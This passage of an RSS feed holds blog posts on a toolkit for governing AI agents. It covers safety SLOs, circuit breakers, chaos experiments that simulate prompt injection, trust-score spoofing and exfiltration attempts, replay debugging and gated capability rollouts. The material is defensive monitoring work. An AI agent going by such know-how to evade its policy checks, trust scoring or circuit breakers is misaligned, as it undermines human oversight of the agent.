&lt;LI&gt;OpenAI Agents SDK&lt;/LI&gt;
&lt;LI&gt;PydanticAI&lt;/LI&gt;
&lt;LI&gt;Model Context Protocol (MCP)&lt;/LI&gt;
&lt;LI&gt;Agent-to-Agent Protocol (A2A)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Each integration wraps the agent framework's tool-calling and message-passing interfaces with AGT's policy engine, trust scoring, and audit logging. Adding governance to an existing agent takes minutes, not weeks.&lt;/P&gt;
&lt;H2&gt;Compliance Framework Alignment&lt;/H2&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 86.0185%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Framework&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;AGT Coverage&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;OWASP Agentic Top 10 (2026)&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;All 10 risk categories mapped&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;NIST AI RMF&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Govern, Map, Measure, Manage functions addressed&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;EU AI Act&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Risk classification, audit trails, human oversight&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;SOC 2 Type II&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Audit logging, access controls, change management&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;CSA ATF&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Zero-trust agent architecture alignment&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Singapore MGF&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Zero-trust, accountability, oversight layers&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H2&gt;Getting Started&lt;/H2&gt;
&lt;LI-CODE lang="powershell"&gt;# Install the complete governance stack
pip install agent-governance-toolkit[full]

# Or install individual components
pip install agent-os-kernel        # Policy engine, VFS, approval workflows
pip install agentmesh-platform     # Identity, trust, encryption, audit
pip install agentmesh-runtime      # Execution rings, kill switch, saga
pip install agent-sre              # Circuit breakers, SLOs, chaos testing&lt;/LI-CODE&gt;
&lt;P&gt;The quickstart tutorial walks through adding policy enforcement to an existing LangChain agent in under 10 minutes. Start with a single policy rule and expand as your governance requirements grow.&lt;/P&gt;
&lt;H2&gt;Contribute and Collaborate&lt;/H2&gt;
&lt;P&gt;AGT is open source under the MIT license. The project has over 2,000 GitHub stars and contributors from 40+ countries. Whether you are building agent governance for your enterprise, integrating a new framework, or extending the policy engine with OPA/Rego or Cedar policies, we welcome contributions.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Repository&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit" target="_blank"&gt;https://github.com/microsoft/agent-governance-toolkit&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Documentation&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://microsoft.github.io/agent-governance-toolkit" target="_blank"&gt;https://microsoft.github.io/agent-governance-toolkit&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Discussions&lt;/STRONG&gt;: GitHub Discussions on the repository&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;Disclaimer: This document is provided for informational purposes. Code examples are from the public AGT repository and may evolve. Always refer to the latest repository documentation for current APIs.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;</description>
      <pubDate>Thu, 28 May 2026 22:04:55 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/governing-ai-agents-against-every-owasp-agentic-risk-a-deep-dive/ba-p/4523749</guid>
      <dc:creator>mosiddi</dc:creator>
      <dc:date>2026-05-28T22:04:55Z</dc:date>
    </item>
    <item>
      <title>Applying Site Reliability Engineering to Autonomous AI Agents</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/applying-site-reliability-engineering-to-autonomous-ai-agents/ba-p/4521357</link>
      <description>&lt;P&gt;If you practice SRE, you already have a mental model for running reliable production systems. You define SLOs. You track error budgets. You use circuit breakers to stop cascading failures. You run chaos experiments to find weaknesses before customers do. You treat every operational decision as a tradeoff between reliability and velocity.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;That mental model transfers directly to AI agents.&lt;/STRONG&gt; It just needs four new ideas.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;In the&amp;nbsp;&lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/agent-governance-toolkit-architecture-deep-dive-policy-engines-trust-and-sre-for/4510105" data-lia-auto-title="Agent Governance Toolkit: Architecture Deep Dive, Policy Engines, Trust, and SRE for AI Agents" data-lia-auto-title-active="0" target="_blank"&gt;Agent Governance Toolkit: Architecture Deep Dive, Policy Engines, Trust, and SRE for AI Agents&lt;/A&gt;, we covered Agent SRE briefly as one of AGT's nine packages: SLOs, error budgets, circuit breakers, chaos engineering, and progressive delivery, adapted from the patterns your SRE team already applies to microservices. Several teams asked for the full story. This is it.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Agent SRE is one of the more novel parts of the toolkit. &lt;/STRONG&gt;The policy engine, zero-trust identity, and execution sandboxing have clear analogs in existing security practice. Agent SRE explores newer ground. Established patterns for defining SLOs for AI agent behavior, building chaos experiments for LLM provider failures, or applying error budgets to agent autonomy are still emerging across the industry. We built these capabilities because running agents in production without them is the equivalent of running a fleet of microservices without circuit breakers, health checks, or an on-call runbook.&lt;/P&gt;
&lt;P&gt;This post is for SRE teams, platform engineers, and anyone responsible for running AI agents in production. You do not need to be an AI specialist. If you know what a burn rate is, you are ready for this.&lt;/P&gt;
&lt;H2&gt;The Problem: Agents Fail in Ways Your Existing SRE Tooling Cannot See&lt;/H2&gt;
&lt;P&gt;When a service fails, your observability stack tells you: latency went up, error rate crossed the SLO threshold, the circuit breaker opened. You page the on-call engineer. They look at traces and find the slow database query.&lt;/P&gt;
&lt;P&gt;When an AI agent fails, your observability stack is silent. The agent returned HTTP 200. Latency was normal. Error rate was zero. But the agent quietly approved a transaction it was not authorized to approve, hallucinated a database path and wrote to the wrong table, or got stuck in a reasoning loop that consumed $800 of LLM API budget before anyone noticed.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;These are not infrastructure failures. They are behavioral failures.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;And they are invisible to monitoring tools built for stateless, deterministic services, because those tools only watch for crashes and timeouts. They do not watch for wrong behavior.&lt;/P&gt;
&lt;P&gt;This gap is the problem Agent SRE was designed to solve. The solution borrows everything from the SRE playbook and adds one concept that extends it: the Safety SLI.&lt;/P&gt;
&lt;H2&gt;The Safety SLI: A New Reliability Dimension&lt;/H2&gt;
&lt;P&gt;Traditional SLIs measure system behavior from the user's perspective: latency, availability, error rate, throughput. They answer: did the service respond correctly?&lt;/P&gt;
&lt;P&gt;For AI agents, correctness is not enough. An agent that responds correctly but acts outside its authorized scope has not succeeded. It has failed in a way that none of your existing SLIs can detect.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;The Safety SLI answers a different question: did the agent act within policy?&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sre import SLO, ErrorBudget
from agent_sre.slo.indicators import PolicyCompliance

# Define a safety SLO: 99% of agent actions must comply with policy
safety_slo = SLO(
    name="safety-compliance",
    indicators=[
        PolicyCompliance(
            target=0.99,
            window="7d",
        ),
    ],
    error_budget=ErrorBudget(
        total=0.01,                      # 1% budget (1 - 0.99 target)
        window_seconds=2592000,          # 30-day window
        burn_rate_alert=2.0,             # warn at 2x sustainable rate
        burn_rate_critical=5.0,          # page at 5x sustainable rate
    ),
)&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;When an agent's policy compliance rate drops below 99%, the error budget starts burning. The ErrorBudget tracks consumption automatically and exposes burn rate alerts through its firing_alerts() method. When the budget is exhausted, the configured exhaustion_action determines the system response:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sre.slo.objectives import ExhaustionAction

# Configure what happens when error budget is exhausted
safety_slo = SLO(
    name="safety-compliance",
    indicators=[PolicyCompliance(target=0.99, window="7d")],
    error_budget=ErrorBudget(
        total=0.01,
        window_seconds=2592000,
        burn_rate_alert=2.0,              # fires at 2x sustainable burn rate
        burn_rate_critical=5.0,           # fires at 5x sustainable burn rate
        exhaustion_action=ExhaustionAction.CIRCUIT_BREAK,  # suspend agent when budget is gone
    ),
)

# In your monitoring loop, check for firing alerts
alerts = safety_slo.error_budget.firing_alerts()
for alert in alerts:
    print(f"Alert firing: {alert.name} (severity: {alert.severity})")

# Check budget status
print(f"Budget remaining: {safety_slo.error_budget.remaining_percent:.1f}%")
print(f"Current burn rate: {safety_slo.error_budget.burn_rate():.2f}x")
print(f"Exhausted: {safety_slo.error_budget.is_exhausted}")&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;This is the governance dial from the other direction.&amp;nbsp;&lt;STRONG&gt;The error budget is not just a metric: it is the mechanism that drives agent autonomy decisions.&lt;/STRONG&gt; An agent with a clean 30-day safety record earns autonomy. An agent whose budget is burning at 5x the sustainable rate triggers a critical alert, and when the budget is exhausted, the exhaustion_action fires: ALERT, THROTTLE, FREEZE_DEPLOYMENTS, or CIRCUIT_BREAK. The graduated response mirrors what SRE teams already do with service SLOs, applied to agent behavior.&lt;/P&gt;
&lt;P&gt;There are multiple SLI dimensions built into Agent SRE. Safety SLIs and Performance SLIs track different aspects of the same agent:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 98.7963%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;SLI Type&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;What It Measures&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Target Pattern&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;When Budget Burns&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Safety SLI&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;PolicyCompliance -- fraction of actions within authorized scope&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;gt;= 99%&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Restrict capabilities, increase human oversight&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Performance SLI&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;TaskSuccessRate, ResponseLatency, CostPerTask&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Configurable per workload&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Alert, throttle, or circuit-break LLM provider&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Additional built-in indicators include ToolCallAccuracy, DelegationChainDepth, HallucinationRate, and CalibrationDeltaSLI. Both SLOs feed into the same error budget dashboard. An agent can have excellent performance but a degrading safety record, or perfect safety compliance and terrible cost efficiency. &lt;STRONG&gt;You need both dimensions to understand whether an agent is production-ready.&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;Circuit Breakers: Governing Agent Failure Modes That Don't Exist in Microservices&lt;/H2&gt;
&lt;P&gt;Circuit breakers for services protect against one failure mode: a backend that is slow or unreachable. The pattern is CLOSED -&amp;gt; OPEN -&amp;gt; HALF_OPEN. You know it well.&lt;/P&gt;
&lt;P&gt;Agent SRE implements the same state machine for failure modes that are specific to autonomous reasoning systems and do not exist in traditional microservice architectures:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sre.cascade.circuit_breaker import CircuitBreakerConfig, CircuitBreaker
from agent_sre.chaos.engine import FaultType

config = CircuitBreakerConfig(
    failure_threshold=5,              # Open after 5 failures in the window
    recovery_timeout_seconds=60,      # Stay OPEN for 60s before HALF_OPEN
    half_open_max_calls=3,            # Allow 3 probes in HALF_OPEN
)

breaker = CircuitBreaker(agent_id="analyst-agent-001", config=config)

# Failure modes tracked by the circuit breaker:
tracked_faults = [
    FaultType.POLICY_BYPASS,           # Agent exceeds authorized scope
    FaultType.ERROR_INJECTION,         # Upstream model API fails
    FaultType.TIMEOUT_INJECTION,       # Tool calls exceed time budget
    FaultType.TRUST_PERTURBATION,      # Agent trust score falls below threshold
    FaultType.DEADLOCK_INJECTION,      # Agent stuck in iterative reasoning
]&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Each failure mode has different circuit-breaking semantics:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 99.0741%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Failure Mode&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;What Triggers It&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Circuit-Break Behavior&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Policy bypass&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Action denied by policy engine&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Count toward threshold; log with full context&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;LLM provider error&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;HTTP 5xx from model API&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Immediately open; route to fallback model if configured&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Tool timeout&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Tool call exceeds timeout_ms&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Count toward threshold; cancel in-flight call&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Trust score degradation&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agent trust score drops below configured floor&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Open; escalate to Ring 3 (untrusted) until score recovers&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Reasoning loop / deadlock&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Token or iteration count exceeds budget&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Open; trigger human review before resuming&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;The reasoning loop breaker deserves attention. A microservice cannot get stuck reasoning. An AI agent absolutely can, and when it does, the failure is not an error code: it is an agent that keeps calling tools, consuming tokens, and generating audit events indefinitely. The circuit breaker detects this pattern from the iteration count and token budget and terminates the loop:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;# Reasoning loop detection configuration
loop_detection_config = {
    "max_iterations": 15,             # Hard stop after 15 reasoning steps
    "max_tokens_per_session": 50000,  # Hard stop on token consumption
    "repetition_threshold": 0.85,     # Stop if &amp;gt;85% of recent actions repeat prior ones
    "on_detection": "circuit_break_and_escalate",
}&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;The state machine behaves identically to what you know from Hystrix or Resilience4j.&amp;nbsp;&lt;STRONG&gt;What changes is the definition of "failure."&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang=""&gt;CLOSED (serving)
  |
  |  failure_threshold crossed for any tracked fault
  v
OPEN (rejecting -- agent action denied, fallback or human-in-loop fires)
  |
  |  recovery_timeout expires
  v
HALF_OPEN (probe -- limited requests allowed through)
  |
  |-- success_threshold met --&amp;gt; CLOSED
  |-- any failure          --&amp;gt; OPEN (reset timeout)&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H2&gt;Chaos Engineering for Agents: Fault Injection for Autonomous Systems&lt;/H2&gt;
&lt;P&gt;&lt;STRONG&gt;The only way to know if your agent system is resilient is to break it intentionally.&lt;/STRONG&gt; Traditional chaos engineering targets infrastructure: kill a pod, inject network latency, saturate a disk. Agent chaos engineering targets the failure modes specific to autonomous reasoning systems.&lt;/P&gt;
&lt;P&gt;Agent SRE ships fault injection templates that cover the failure modes teams consistently underestimate until they hit production:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sre.chaos.engine import ChaosExperiment, Fault, FaultType

# Experiment 1: LLM provider degrades -- model returns valid responses but with
# increased latency and occasional malformed outputs
experiment = ChaosExperiment(
    name="llm-degradation-resilience",
    target_agent="analyst-agent-001",
    description="Test agent behavior under degraded LLM provider",
    faults=[
        Fault.latency_injection(target="llm-provider", delay_ms=8000),
        Fault.error_injection(target="llm-provider", rate=0.05),
    ],
    duration_seconds=300,
)

# Experiment 2: Trust score manipulation -- simulates an agent receiving
# messages from a peer with a spoofed trust score
trust_experiment = ChaosExperiment(
    name="trust-manipulation-resilience",
    target_agent="orchestrator-001",
    faults=[
        Fault(
            fault_type=FaultType.TRUST_PERTURBATION,
            target="did:mesh:orchestrator-001",
            params={"spoofed_score": 950},
        ),
    ],
    duration_seconds=120,
)

# Experiment 3: Tool timeout cascade -- multiple tools time out simultaneously,
# testing whether the agent abandons gracefully or enters a reasoning loop
cascade_experiment = ChaosExperiment(
    name="tool-timeout-cascade",
    target_agent="analyst-agent-001",
    faults=[
        Fault.timeout_injection(target="database.read", delay_ms=30000),
        Fault.timeout_injection(target="api.call", delay_ms=30000),
    ],
    duration_seconds=180,
)

# Run the experiment
experiment.start()
# ... inject faults during agent execution ...
resilience = experiment.calculate_resilience(
    baseline_success_rate=0.95,
    experiment_success_rate=0.87,
    recovery_time_ms=48000,
)
experiment.complete(resilience=resilience)
print(f"Resilience score: {resilience.overall}/100 -- {'PASSED' if resilience.passed else 'FAILED'}")&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Additional fault types built into the chaos engine cover: prompt injection attempts, privilege escalation, data exfiltration attempts, identity spoofing, deadlock injection, and contradictory instruction scenarios. Each maps to a FaultType enum value and can be composed into multi-fault experiments.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Important:&lt;/STRONG&gt; The chaos engine records that a fault was injected and triggers the governance response pipeline. Actual infrastructure-level fault injection (network partition, process kill) should be implemented using your existing chaos tooling (Chaos Mesh, Gremlin, Azure Chaos Studio, or similar). Agent SRE governs the agent's behavioral response to faults; it does not own infrastructure manipulation. These two layers are designed to compose.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;Each chaos experiment produces a structured resilience score via calculate_resilience(), which compares baseline and experiment success rates. A score of 90+ with passed=True means the agent maintained at least 90% of its baseline performance under fault conditions. Teams use this to set minimum resilience thresholds for production readiness.&lt;/P&gt;
&lt;H2&gt;Replay Debugging: Reproduce Behavioral Failures Exactly&lt;/H2&gt;
&lt;P&gt;Infrastructure incidents are reproducible because infrastructure is deterministic. AI agent incidents are hard to reproduce because agent behavior depends on model state, context window content, and the sequence of tool call results, none of which are preserved by default after a session ends.&lt;/P&gt;
&lt;P&gt;Agent SRE's replay engine records every agent session as a replayable artifact: the full trace at each step, every tool call with its inputs and outputs, every policy evaluation with its decision, and every trust score at the time of each inter-agent message.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sre.replay.capture import TraceStore
from agent_sre.replay.engine import ReplayEngine, ReplayMode

# Traces are captured automatically when SRE tracing is active
store = TraceStore(
    backend="azure_blob",
    retention_days=30,
)

# When an incident occurs, replay the session exactly
engine = ReplayEngine(store=store)

# Full replay: re-run the session against the same recorded inputs
# Uses recorded tool outputs -- no live tool calls -- so replay is deterministic
result = await engine.replay(
    trace_id="trace_2026_05_a7f3b2",
    mode=ReplayMode.FULL,
)

for step in result.steps:
    print(f"Step {step.index}: {step.action} -&amp;gt; {step.decision}")

# Divergence analysis: replay with a policy change applied
# Shows exactly which actions would have been blocked under the new policy
diff_result = await engine.diff(
    trace_id="trace_2026_05_a7f3b2",
    policy_override="policies/stricter-v2.yaml",
)

for diff in diff_result.diffs:
    if diff.description:
        print(f"Step {diff.span_name}: was {diff.original}, "
              f"would be {diff.replayed} under new policy")&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;The divergence analysis is the feature teams use most.&lt;/STRONG&gt; When a policy change is proposed, you replay recent production traces against the new policy to see how many actions would have been blocked, which sessions would have failed, and what the error budget impact would have been. Policy changes stop being guesswork.&lt;/P&gt;
&lt;H2&gt;Progressive Delivery: Safely Rolling Out New Agent Capabilities&lt;/H2&gt;
&lt;P&gt;When you ship a new service version, you do not send it to all traffic at once. You use canary deployments, feature flags, or traffic splitting. You watch the SLOs. If they degrade, you roll back.&lt;/P&gt;
&lt;P&gt;Agent SRE brings the same discipline to agent capability rollout. When you expand an agent's authorized scope, giving it write access it did not have, connecting it to a new tool, or raising its trust floor, you do not expand to the full fleet immediately. You expand progressively, with automated SLO gates controlling each stage.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sre.delivery.rollout import (
    AnalysisCriterion,
    CanaryRollout,
    RollbackCondition,
    RolloutStep,
)

rollout = CanaryRollout(
    name="database-write-capability",
    steps=[
        RolloutStep(
            name="canary",
            weight=0.05,                   # 5% of agents get the new capability
            duration_seconds=86400,        # 24 hours
            analysis=[
                AnalysisCriterion(metric="safety_sli", threshold=0.995),
                AnalysisCriterion(metric="performance_sli", threshold=0.90),
                AnalysisCriterion(
                    metric="error_budget_consumed",
                    threshold=0.10,
                    comparator="lte",      # canary can burn at most 10%
                ),
            ],
        ),
        RolloutStep(
            name="early-adopters",
            weight=0.25,                   # 25% traffic
            duration_seconds=172800,       # 48 hours
            analysis=[
                AnalysisCriterion(metric="safety_sli", threshold=0.990),
                AnalysisCriterion(metric="performance_sli", threshold=0.88),
            ],
        ),
        RolloutStep(
            name="general-availability",
            weight=1.0,                    # 100% traffic
            duration_seconds=604800,       # 1 week of full observation
            analysis=[
                AnalysisCriterion(metric="safety_sli", threshold=0.990),
                AnalysisCriterion(metric="performance_sli", threshold=0.85),
            ],
        ),
    ],
    rollback_conditions=[
        RollbackCondition(metric="safety_sli", threshold=0.95, comparator="lte"),
    ],
)

# Start the rollout -- SLO gates evaluate at each step
rollout.start()

# Advance to next step when analysis criteria pass
if rollout.advance():
    print(f"Advanced to step: {rollout.current_step.name}")
    print(f"Progress: {rollout.progress_percent:.0f}%")&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;The SLO gate at each step is the same mechanism as a CI/CD quality gate, but measured on live production behavior rather than test results. An agent capability that degrades the safety SLI during canary does not promote to the next step. If a RollbackCondition fires, the rollout rolls back automatically.&amp;nbsp;&lt;STRONG&gt;This is the mechanism that makes it operationally safe to expand agent autonomy: every expansion is measurable, every measurement gates the next expansion, and rollback is automatic.&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;Health Checks and Backpressure&lt;/H2&gt;
&lt;P&gt;Traditional health checks answer: is the service alive? For agents, alive is not enough. A healthy agent is one that is alive, operating within policy, consuming resources within budget, and maintaining a trust score above the Ring threshold it was assigned.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;# Agent health check covering multiple dimensions
health = await agent_health_check(
    agent_id="analyst-agent-001",
    dimensions=[
        "liveness",            # Is the agent process running?
        "policy_compliance",   # Is safety SLI above threshold?
        "trust_score",         # Is trust score above Ring floor?
        "resource_budget",     # Is token/API spend within limits?
        "tool_availability",   # Are the tools the agent needs reachable?
    ],
)

# health.status: "healthy" | "degraded" | "unhealthy"
# health.dimensions: per-dimension pass/fail with values
# health.recommended_action: "none" | "restrict" | "suspend" | "terminate"&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;When health checks report degradation, backpressure controls engage before the circuit breaker opens. Backpressure is the earlier, softer response: accept fewer concurrent tasks, reject low-priority work, drain in-flight tasks gracefully before the situation escalates.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;# Backpressure configuration
backpressure_config = {
    "backpressure_threshold": 0.80,    # Engage when resource utilization &amp;gt; 80%
    "max_concurrent": 5,               # Hard cap on simultaneous agent tasks
    "priority_shedding": True,         # Drop low-priority tasks first
    "drain_timeout_seconds": 30,       # Allow in-flight tasks to complete
}&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;The ordering matters: backpressure first, then circuit breaker, then suspension.&lt;/STRONG&gt; Each stage is recoverable. Each stage preserves more agent state than the next. The SRE principle of graduated response applies to agents exactly as it applies to services.&lt;/P&gt;
&lt;H2&gt;Observability: Governance Metrics Flow Into Your Existing Stack&lt;/H2&gt;
&lt;P&gt;&lt;STRONG&gt;Agent SRE does not ask you to adopt a new observability platform.&lt;/STRONG&gt; Governance metrics are exported through the same adapters your infrastructure monitoring already uses, including OpenTelemetry, Prometheus, Datadog, and others.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sre.tracing.exporters import configure_exporters

configure_exporters(
    backends=[
        {"type": "prometheus", "endpoint": "http://prometheus:9090"},
        {"type": "opentelemetry", "endpoint": "http://otel-collector:4317"},
    ],
    include_metrics=[
        "slo.safety_sli",               # Per-agent safety compliance rate
        "slo.error_budget_remaining",    # Error budget in percentage
        "slo.burn_rate",                 # Current burn rate vs sustainable
        "circuit_breaker.state",         # CLOSED / OPEN / HALF_OPEN
        "circuit_breaker.failure_count",
        "trust_score.current",           # Agent trust score (0-1000)
        "trust_score.ring",              # Current execution ring
        "chaos.experiments_run",         # Chaos experiment telemetry
        "health.status",                 # Aggregate health status
        "backpressure.load",             # Current load vs threshold
    ],
)&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Key governance metrics available in your existing dashboards:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 99.3519%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Metric&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;What It Tells You&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Alert Condition&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
